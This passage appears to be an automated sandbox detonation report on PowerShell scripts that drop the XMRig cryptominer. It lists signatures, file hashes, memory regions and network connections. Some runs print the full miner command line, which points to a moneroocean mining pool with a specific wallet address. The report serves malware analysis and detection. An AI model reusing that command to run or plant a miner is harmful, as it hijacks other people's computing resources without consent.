| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5040 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5040 wrote to memory of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/5040-0-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_urs2oi5d.dqc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5040-9-0x000002696F350000-0x000002696F372000-memory.dmp
memory/5040-10-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-11-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-12-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-14-0x000002696F3C0000-0x000002696F3D2000-memory.dmp
memory/5040-15-0x000002696F340000-0x000002696F34A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1820-46-0x0000028734E80000-0x0000028734EA0000-memory.dmp
memory/1820-47-0x00000287365F0000-0x0000028736610000-memory.dmp
memory/1820-48-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-50-0x0000028736610000-0x0000028736630000-memory.dmp
memory/1820-51-0x0000028736630000-0x0000028736650000-memory.dmp
memory/5040-49-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp
memory/5040-53-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp
memory/1820-52-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-54-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-55-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-57-0x0000028736630000-0x0000028736650000-memory.dmp
memory/1820-56-0x0000028736610000-0x0000028736630000-memory.dmp
memory/1820-58-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-59-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-60-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-61-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-62-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-63-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-64-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-65-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-66-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-67-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-68-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-69-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-70-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-71-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-72-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-73-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-74-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-75-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-76-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-77-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-78-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-79-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-80-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-81-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-82-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-83-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-84-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-85-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-86-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-87-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-88-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-89-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-90-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-91-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-92-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-93-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-94-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-95-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-96-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-97-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-98-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-99-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-100-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-101-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-102-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-103-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-104-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-105-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-106-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-107-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-108-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-109-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-110-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-111-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-112-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-113-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-114-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-115-0x00007FF732B10000-0x00007FF733743000-memory.dmp
memory/1820-116-0x00007FF732B10000-0x00007FF733743000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win11-20240508-en
Max time kernel
1651s
Max time network
1660s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp
memory/2492-9-0x000001B1AA220000-0x000001B1AA242000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsgnixku.waa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2492-10-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/2492-11-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/2492-12-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/2492-13-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp
memory/2492-14-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:49
Platform
win10v2004-20240226-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3588 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3588 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4164 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | 29.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
Files
memory/3588-0-0x00007FF984463000-0x00007FF984465000-memory.dmp
memory/3588-1-0x00000172E7E90000-0x00000172E7EB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pko3hmyb.2v0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3588-11-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/3588-12-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/3588-13-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/3588-15-0x00000172E8240000-0x00000172E8252000-memory.dmp
memory/3588-16-0x00000172E8220000-0x00000172E822A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4468-47-0x000001E9C6880000-0x000001E9C68A0000-memory.dmp
memory/3588-48-0x00007FF984463000-0x00007FF984465000-memory.dmp
memory/3588-49-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/4468-50-0x000001E9C68D0000-0x000001E9C68F0000-memory.dmp
memory/3588-51-0x00007FF984460000-0x00007FF984F21000-memory.dmp
memory/4468-52-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-53-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-54-0x000001E9C6910000-0x000001E9C6930000-memory.dmp
memory/4468-55-0x000001E9C6930000-0x000001E9C6950000-memory.dmp
memory/4468-56-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-57-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-58-0x000001E9C6910000-0x000001E9C6930000-memory.dmp
memory/4468-59-0x000001E9C6930000-0x000001E9C6950000-memory.dmp
memory/4468-60-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-61-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-62-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-63-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-64-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-65-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-66-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-67-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-68-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-69-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-70-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-71-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-72-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-73-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-74-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-75-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-76-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-77-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-78-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-79-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-80-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-81-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-82-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-83-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-84-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-85-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-86-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-87-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-88-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-89-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-90-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-91-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-92-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-93-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-94-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-95-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-96-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-97-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-98-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-99-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-100-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-101-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-102-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-103-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-104-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-105-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-106-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-107-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-108-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-109-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-110-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-111-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-112-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-113-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-114-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-115-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-116-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-117-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
memory/4468-118-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win11-20240508-en
Max time kernel
1651s
Max time network
1661s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/3876-0-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgpwoh3e.tsx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3876-9-0x0000018DB7680000-0x0000018DB76A2000-memory.dmp
memory/3876-10-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/3876-11-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/3876-12-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/3876-13-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
memory/3876-14-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp